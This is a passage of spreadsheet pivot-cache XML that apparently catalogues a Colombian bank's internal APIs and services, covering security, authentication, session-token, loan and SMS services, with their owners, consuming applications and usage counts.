    <n v="100"/>
    <x v="382"/>
    <s v="El API Security Access Entitlement - Information permite consultar los privilegios disponibles que tiene un usuario con el fin de gestionar sus relaciones en Entitlement."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-06-09T21:35:07"/>
    <s v="Security Access Entitlement Schemes"/>
    <n v="100"/>
    <s v="Security Access Entitlement Schemes - Information"/>
    <n v="100"/>
    <x v="383"/>
    <s v="El Api permite consultar los esquemas de un cliente asociados a Entitlement, se tienen los siguientes esquemas Administración íºnica: Ejecutor directo es el equema que permite tener un usuario super poderoso, para usar este se requiere  un usuario al cual se le debe asignar el rol titular. Administración míºltiple: Control Dual es el equema que permite tener dos usuarios depedientes uno del otro, para usar este esquema se requieren 2 usuarios a los cuales se le debe asignar el rol titular. titularAdministración míºltiple x2:  Control dual X 2 es el equema que permite tener 4 usuarios, divididos en dos grupos monetario y no monetario, para usar este esquema se requieren 4 usuarios, 2 de ellos con rol titular monetario y los otros 2 con rol titular no monetario.Administración míºltiple x3:  Control dual X 3 es el esquema que permite tener 6 usuarios, divididos en tres grupos monetario, no monetario y administrativo, para usar este esquema se requieren 6 usuarios, 2 de ellos con rol titular monetario , los otros 2 con rol titular no monetario y los ultimos 2 titular administrativo"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-20T14:40:19"/>
    <s v="Security Alphanumeric"/>
    <n v="101"/>
    <s v="Security Alphanumeric - Passwords Management"/>
    <n v="101"/>
    <x v="384"/>
    <s v="Esta API permite gestionar la creación, validación y cambio de clave alfanumérica que está asociada al alias de un usuario para el ingreso desde un canal consumidor. La clave alfanumérica debe tener como mí­nimo 8 caracteres otorgando así­ una mayor seguridad al ingreso de cualquier canal, generando un control más disuasivo para intentos de adivinación, reduciendo el níºmero de clientes suplantados por adivinación acogiéndose a los estándares de la industria para la autenticación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-06T15:41:16"/>
    <s v="Security Application"/>
    <n v="110"/>
    <s v="Security Application - Event Records"/>
    <n v="110"/>
    <x v="385"/>
    <s v="Esta API permite la consulta de los eventos funcionales de las aplicaciones del ecosistema de seguridad, de forma de que el manejo de estos eventos sea estándar obteniendo la información sobre los sucesos en cada una de las aplicaciones.  Ofrece la capacidad de realizar la consulta por procesos, acciones, aplicaciones o actores que generaron registros en las aplicaciones."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <n v="4"/>
    <n v="10"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-03T15:24:44"/>
    <s v="Security Channel"/>
    <n v="101"/>
    <s v="Security Channel - Authentication Credentials"/>
    <n v="101"/>
    <x v="386"/>
    <s v="Esta API permite una autenticación de credenciales la cual retorna un token JWT que contiene la información del cliente, íºltima fecha y hora de acceso y token de sesión, para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Se puede generar usando las credenciales cifradas del cliente, es decir, cuando el Cliente se autentica."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="APP-PERSONAS_NU0146001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-25T17:54:35"/>
    <s v="Security Code"/>
    <n v="100"/>
    <s v="Security Code - Management"/>
    <n v="100"/>
    <x v="387"/>
    <s v="Esta API ofrece las capacidades que permiten realizar la generacion de un codigo de seguridad y la validacion de este mismo."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="AW133302_securityCode _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <n v="17"/>
    <m/>
    <n v="7"/>
    <n v="1"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-07-27T20:41:55"/>
    <s v="Security Code"/>
    <n v="200"/>
    <s v="Security Code - Management"/>
    <n v="200"/>
    <x v="387"/>
    <s v="Esta API ofrece las capacidades que permiten realizar la generacion de un codigo de seguridad y la validacion de este mismo."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="Management_AW1333002"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="1"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-08T15:41:35"/>
    <s v="Security Contacts"/>
    <n v="112"/>
    <s v="Security Contacts - Information"/>
    <n v="102"/>
    <x v="388"/>
    <s v="El api de 'Security Contacts - Information'? es la capacidad que se ofrece a los clientes Bancolombia, para obtener la información relacionada de los clientes con personas de su entera confianza que puedan autenticar por medio de un código enviado la información de un cliente. Los escenarios de uso de la capacidad son referentes a confirmaciones que tendrá que realizar un cliente cuando requiera realizar algíºn proceso que tenga este flujo de contactos establecido. Vinculación de un contacto, desbloqueo de la clave dinámica, confirmación para modificar información entre otras.  El api de Security Contacts - Information contará la capacidad de consultar los contactos de ayuda asociados a un cliente por medio de la operación Listar contactos."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="28"/>
    <n v="6"/>
    <n v="12"/>
    <n v="26"/>
    <n v="1738"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-22T09:22:38"/>
    <s v="Security Contacts"/>
    <n v="112"/>
    <s v="Security Contacts - Management"/>
    <n v="112"/>
    <x v="389"/>
    <s v="El api de Security Contacts - Management es la capacidad que se ofrece a los clientes Bancolombia, para administrar y gestionar los contactos de ayuda de un cliente, que son personas de su entera confianza que puedan autenticar por medio de un código enviado la información del mismo. Los escenarios de uso de la capacidad son referentes a confirmaciones que tendrá que realizar un cliente cuando requiera realizar algíºn proceso que tenga este flujo de contactos establecido. Vinculación de un contacto, desbloqueo de la clave dinámica, confirmación para modificar información entre otras."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="153"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-08T15:41:35"/>
    <s v="Security Contacts"/>
    <n v="112"/>
    <s v="Security Contacts - OTP"/>
    <n v="102"/>
    <x v="390"/>
    <s v="El Api de Security Contacts - OTP es la capacidad que se ofrece a los clientes Bancolombia, para validar temas referentes a acciones dentro de los canales banco por medio de personas de su entera confianza que han sido previamente vinculadas para que  puedan autenticar por medio de un código enviado la información de un cliente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-26T09:14:43"/>
    <s v="Security Session Id"/>
    <n v="205"/>
    <s v="Security Session Id - OAuth"/>
    <n v="204"/>
    <x v="391"/>
    <s v="Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosTributariosCliente/V1.0"/>
    <s v="MDM"/>
    <s v="EASYHOME_NU0004001 _x000d__x000a_ SVP_NU0004001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ PortalConstructor_AW0360004 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ SVETDL_AW0360006 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ AW1312001_SVS_ENROLAMIENTO _x000d__x000a_ Networking_NU0046001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ MigracionFUA_AW1291001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ Transversal_AW0937001 _x000d__x000a_ BancolombiaPay_AW1435001"/>
    <n v="319853"/>
    <n v="1060325"/>
    <n v="690881"/>
    <n v="1431176"/>
    <n v="1574453"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-26T09:14:43"/>
    <s v="Security Session Id"/>
    <n v="300"/>
    <s v="Security Session Id - OAuth"/>
    <n v="300"/>
    <x v="391"/>
    <s v="Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosTributariosCliente/V1.0"/>
    <s v="MDM"/>
    <s v="PEP_AW1281002 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ Marketplacetu360HM_NU0035001 _x000d__x000a_ SVECarteraComercial_NU0162001 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ ModuloSVELeasing_AW0360006"/>
    <n v="319853"/>
    <n v="1060325"/>
    <n v="690881"/>
    <n v="1431176"/>
    <n v="1574453"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-25T16:47:43"/>
    <s v="Security Session Management"/>
    <n v="100"/>
    <s v="Security Session Management - Session Management"/>
    <n v="100"/>
    <x v="392"/>
    <s v="Esta API permite conocer si la identidad digital de un usuario se encuentra registrada y activa."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="MigracionFUA_AW1291001 _x000d__x000a_ PortalAutogestionPyme_AW1287 _x000d__x000a_ SVSENROLAMIENTO_AW1312001 _x000d__x000a_ SVSENROLAMIENTO_AW1312001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ HDC_AW0453001 _x000d__x000a_ Transversal_AW0937001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ ModuloNegociosFiduciarios_NU0247001"/>
    <m/>
    <m/>
    <n v="2"/>
    <n v="753"/>
    <n v="2127812"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-06-02T11:17:46"/>
    <s v="Security Session Management"/>
    <n v="100"/>
    <s v="Security Session Management - Session Management"/>
    <n v="100"/>
    <x v="392"/>
    <s v="Esta API permite conocer si la identidad digital de un usuario se encuentra registrada y activa."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001"/>
    <m/>
    <m/>
    <n v="2"/>
    <n v="753"/>
    <n v="2127812"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-09-05T12:19:33"/>
    <s v="Security Simple Authentication"/>
    <n v="110"/>
    <s v="Security Simple Authentication - OAuth"/>
    <n v="110"/>
    <x v="393"/>
    <s v="Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosComplementariosCliente/V1.0"/>
    <m/>
    <s v="FUA_AW1291001 _x000d__x000a_ PEP_AW1281002 _x000d__x000a_ EDIN_AW1185001 _x000d__x000a_ MigracionFUA_AW1291001"/>
    <m/>
    <m/>
    <n v="63"/>
    <n v="309"/>
    <n v="352"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-09-05T12:19:33"/>
    <s v="Security Simple Authentication"/>
    <n v="200"/>
    <s v="Security Simple Authentication - OAuth"/>
    <n v="200"/>
    <x v="393"/>
    <s v="Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco "/>
    <s v="ConsultaDatosComplementariosCliente/V1.0"/>
    <m/>
    <s v="PEP_AW1281002 _x000d__x000a_ EDIN_AW1185001"/>
    <m/>
    <m/>
    <n v="63"/>
    <n v="309"/>
    <n v="352"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Seguimiento Solicitudes Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio tiene la capacidad de permitir a las diferentes áreas del banco registrar las novedades de una solicitud y poder consultar el estado de la solicitud."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="AW0611001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Seguridad Informacion Tarjetas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio de seguridad información tarjetas, permite consultar la información sensible de las tarjetas de crédito, débito y e-prepago."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="Modulo de Administracion de Tarjetas (MAT)_MAT_ISMAT0003"/>
    <s v="AW1189001 _x000d__x000a_NU0019001 _x000d__x000a_NU0103001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Seguro De Retiro En Cajero"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Esta versión permite a los consumidores la opción de asegurar un retiro de dinero en cajeros como el electrónico, adicionalmente permite conocer la información de los retiros que han sido asegurados. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="30"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="NU0021001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1151001 _x000d__x000a_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-12T17:09:30"/>
    <s v="Customer Investment Authentication"/>
    <n v="102"/>
    <s v="Session Token - Management"/>
    <n v="102"/>
    <x v="394"/>
    <s v="Permite la creación y validación de token de sesión para un cliente en especí­fico en Valores Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v=""/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="2558"/>
    <n v="2634"/>
    <n v="1930"/>
    <n v="2011"/>
    <n v="2027"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-09-08T08:40:41"/>
    <s v="Loans Sufi"/>
    <n v="100"/>
    <s v="Simulation"/>
    <n v="100"/>
    <x v="288"/>
    <s v="El API Simulación del Crédito? se encarga de recibir los datos básicos, valores y plazo de un posible crédito, para proceder a generar una simulación y responder con los resultados de cuotas y demás datos de pagos que el cliente asumirá, para que con dicha información pueda tomar la decisión de iniciar la radicación del estudio de crédito. Esta API será genérica para cualquier producto o lí­nea de negocio en SUFI."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="39841"/>
    <n v="20880"/>
    <n v="342"/>
    <n v="594"/>
    <n v="645"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Sincronizacion Estados PQRS"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite reportar el estado de los PQR de queja o reclamos de origen banco o de la superfinanciera"/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Tatiana Andrea Cardenas"/>
    <m/>
    <m/>
    <s v="AW0611001 _x000d__x000a_AW611001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-15T16:52:57"/>
    <s v="SME Credit Cards"/>
    <n v="101"/>
    <s v="SME Credit Cards - cards information"/>
    <n v="101"/>
    <x v="395"/>
    <s v="El API  permite consultar la información de tarjetas de crédito para PYME. Permite listar las tarjetas PYME de un cliente o consultar los saldos consolidados de las tarjetas asociadas a un cliente PYME."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <s v="ConsultaTarjetasPYME/V1.0"/>
    <m/>
    <s v="LimitsCreditExhibition_NU0114001"/>
    <m/>
    <n v="2"/>
    <n v="1"/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-08-20T16:37:53"/>
    <s v="Sms Notifications"/>
    <n v="100"/>
    <s v="Sms Notifications - Send Sms Message"/>
    <n v="100"/>
    <x v="396"/>
    <s v="La Api permite realizar el enví­o de mensajes SMS a través del proveedor de delivery Inalambria. Este servicio está enfocado a consumidores transaccionales que realizan enví­o de mensajes a partir de la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes. "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="EnvioSmsInalambria/V1.0"/>
    <m/>
    <s v="BIZAGIAC_AW1285001 _x000d__x000a_ APM_AW1097001 _x000d__x000a_ PortalAutogestionPyme_AW1287 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ Decision-Manager_NU0010001 _x000d__x000a_ LoansApproval_NU107001 _x000d__x000a_ prueba _x000d__x000a_ CuponPagosDigital_AW0214001 _x000d__x000a_ Inversi_NU0160001"/>
    <n v="103245"/>
    <n v="90069"/>
    <n v="84307"/>
    <n v="94873"/>
    <n v="120539"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Solicitud De Autorizacion"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite a los diferentes sistemas de Bancolombia solicitar que se autorice a un perfil de usuario sobre un archivo existente en una ruta ifs del iSeries"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Transversales iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="SEGRAUTOBJ (AS400)"/>
    <s v="AW01065 _x000d__x000a_SU2 _x000d__x000a_SUF _x000d__x000a_ALM _x000d__x000a_NU0001 _x000d__x000a_AW1078 _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-11T10:53:04"/>
    <s v="Sufi Loan"/>
    <n v="130"/>
    <s v="Sufi Loan - Loans Information"/>
    <n v="104"/>
    <x v="287"/>
    <s v="La API Sufi Loan - Loans Information tiene como objetivo obtener todas las obligaciones o sus detalles.  Esta posee las siguientes operaciones: --- - Consulta de obligaciones básica: Todas las obligaciones a partir de un documentId - Consulta de obligaciones detallada: Detalles de una obligación a partir de su loanId - Consulta de obligaciones por alianza: Consulta todas las obligaciones como la consulta de obligaciones básica además de filtrar por su respectiva alianza."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="DesembolsosSufi_AW1097001 _x000d__x000a_ Monitoreo_AW1097001 _x000d__x000a_ adaptadorSufi_ISSU20003 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <n v="175315"/>
    <n v="264901"/>
    <n v="292700"/>
    <n v="308208"/>
    <n v="396773"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-28T13:49:21"/>
    <s v="Sufi Loan"/>
    <n v="130"/>
    <s v="Sufi Loan - Transactions"/>
    <n v="120"/>
    <x v="397"/>
    <s v="La API Sufi Loan - Transactions tiene como objetivo entregar información correspondiente a los movimientos o transacciones realizadas por pagos a una obligación puntual obtenida por el cliente.  Esta posee las siguiente operación: --- - Consulta de Transacciones: Todas los movimientos de una obligación a partir de un loanId"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="DesembolsosSufi_AW1097001 _x000d__x000a_ Monitoreo_AW1097001 _x000d__x000a_ adaptadorSufi_ISSU20003 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <m/>
    <n v="4"/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-06-23T15:29:13"/>
    <s v="Tec-Commerce Portal"/>
    <n v="160"/>
    <s v="Tec - commerce portal channel - customer information"/>
    <n v="120"/>
    <x v="398"/>
    <s v="Esta API permitirá exponer las diferentes consultas que desde el canal portal comercio se requieren para la administración del canal desde el Modulo Administrativo u otros canales o consumidores que requieran acceder a la información del canal y a sus diferentes funcionalidades."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Portal Comercio"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Modulo Administrativo Canales Digitales_AW1204 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-11-20T18:05:31"/>
    <s v="Tec-Payments ACH Fulfillment"/>
    <n v="102"/>
    <s v="Tec - Customer - Enrollment"/>
    <n v="102"/>
    <x v="399"/>
    <s v="El API  permite vincular las cuentas activas de ahorro y corriente del cliente Bancolombia con el  número de celular para realizar las transferencias Inmediatas en ACH en Lí­nea."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="CapaGestionCanal_NU0014001"/>
    <n v="102826"/>
    <n v="76379"/>
    <n v="508791"/>
    <n v="778265"/>
    <n v="910223"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-10-08T17:28:04"/>
    <s v="Tec - Customer"/>
    <n v="121"/>
    <s v="Tec - Customer - General Information"/>
    <n v="100"/>
    <x v="400"/>
    <s v="API que permite consultar la informacion general de un cliente sea persona natural o jurí­dica."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="RecuperarDatosCliente/V4.0"/>
    <s v="MDM"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ plink_AW1206001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ APM_NU0032001 _x000d__x000a_ LifeCoach_AW1240001 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ TabotWhatsapp_AW1165 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ NEQUIMDM_AW1011 _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="54"/>
    <n v="8"/>
    <n v="296"/>
    <n v="5470"/>
    <n v="8549"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-07-09T03:14:34"/>
    <s v="Tec - Customer"/>
    <n v="121"/>
    <s v="Tec - Customer - Obtain Payment Methods"/>
    <n v="104"/>
    <x v="401"/>
    <s v="Permite obtener el grupo de productos desde los cuales se puede realizar el pago"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="ConsultaProductoDepositos/V1.0"/>
